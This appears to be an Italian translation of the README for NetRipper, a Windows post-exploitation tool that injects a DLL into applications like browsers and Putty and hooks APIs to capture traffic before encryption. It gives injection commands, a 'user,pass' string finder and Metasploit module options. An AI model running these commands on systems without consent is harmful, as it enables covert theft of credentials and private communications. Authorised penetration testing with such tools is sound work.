
NetRipper - Sniffing intelligente del traffico per penetration tester
NetRipper è uno strumento di post-sfruttamento che colpisce sistemi Windows e utilizza l'hooking delle API per intercettare il traffico di rete e le funzioni di crittografia da un utente con privilegi bassi, riuscendo a catturare sia il traffico in chiaro che quello crittografato prima della crittografia/dopo la decrittografia.
NetRipper è stato presentato al Defcon 23, Las Vegas, Nevada.
L'uso di NetRipper per attaccare bersagli senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma!
Le attività di post-sfruttamento in un test di penetrazione possono essere impegnative se il tester ha privilegi bassi su una macchina Windows completamente patchata e ben configurata. Questo lavoro presenta una tecnica per aiutare il tester a trovare informazioni utili sniffando il traffico di rete delle applicazioni sulla macchina compromessa, nonostante i suoi diritti di basso privilegio. Inoltre, il traffico crittografato viene catturato prima di essere inviato al layer di crittografia, quindi tutto il traffico (in chiaro e crittografato) può essere sniffato. L'implementazione di questa tecnica è uno strumento chiamato NetRipper che utilizza l'hooking delle API per eseguire le azioni sopra menzionate ed è stato progettato appositamente per essere utilizzato in test di penetrazione, ma il concetto può essere utilizzato anche per monitorare il traffico di rete dei dipendenti o per analizzare un'applicazione dannosa.
NetRipper dovrebbe essere in grado di catturare il traffico di rete da: Putty, WinSCP, SQL Server Management Studio, Microsoft Outlook, Google Chrome, Mozilla Firefox e molti altri strumenti. L'elenco non si limita a queste applicazioni, ma altri strumenti potrebbero richiedere un supporto speciale.
NetRipper.exe - Configures and inject the DLL
DLL.dll - Injected DLL, hook APIs and save data to files
netripper.rb - Metasploit post-exploitation module
Una build automatica su AppVeyor è disponibile. I binari possono essere scaricati dalla sezione Artifacts qui.
Injection: NetRipper.exe DLLpath.dll processname.exe
Example: NetRipper.exe DLL.dll firefox.exe
Generate DLL:
-h, --help Print this help message
-w, --write Full path for the DLL to write the configuration data
-l, --location Full path where to save data files (default TEMP)
Plugins:
-p, --plaintext Capture only plain-text data. E.g. true
-d, --datalimit Limit capture size per request. E.g. 4096
-s, --stringfinder Find specific strings. E.g. user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
msf exploit(multi/handler) > use post/windows/gather/netripper/netripper
msf post(windows/gather/netripper/netripper) > show options
Module options (post/windows/gather/netripper/netripper):
Name Current Setting Required Description
---- --------------- -------- -----------
DATALIMIT 65535 no The number of bytes to save from requests/responses
DATAPATH TEMP no Where to save files. E.g. C:\Windows\Temp or TEMP
DLLPATH no Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...
PLAINTEXT false no True to save only plain-text data
PROCESSIDS no Process IDs. E.g. 1244,1256
PROCESSNAMES no Process names. E.g. firefox.exe,chrome.exe
SESSION yes The session to run this module on.
STRINGFINDER DEFAULT no Search for specific strings in captured data
Imposta PROCESSNAMES o PROCESSIDS ed esegui.
@HarmJ0y ha aggiunto l'implementazione PowerShell di Invoke-NetRipper.ps1 di NetRipper.exe Tieni presente che il modulo PowerShell non è aggiornato.
Puoi trovare il changelog nel file "Changelog.md" e le istruzioni di compilazione nel file "Compilation.md".
NetRipper utilizza
Ionut Popescu (@NytroRST)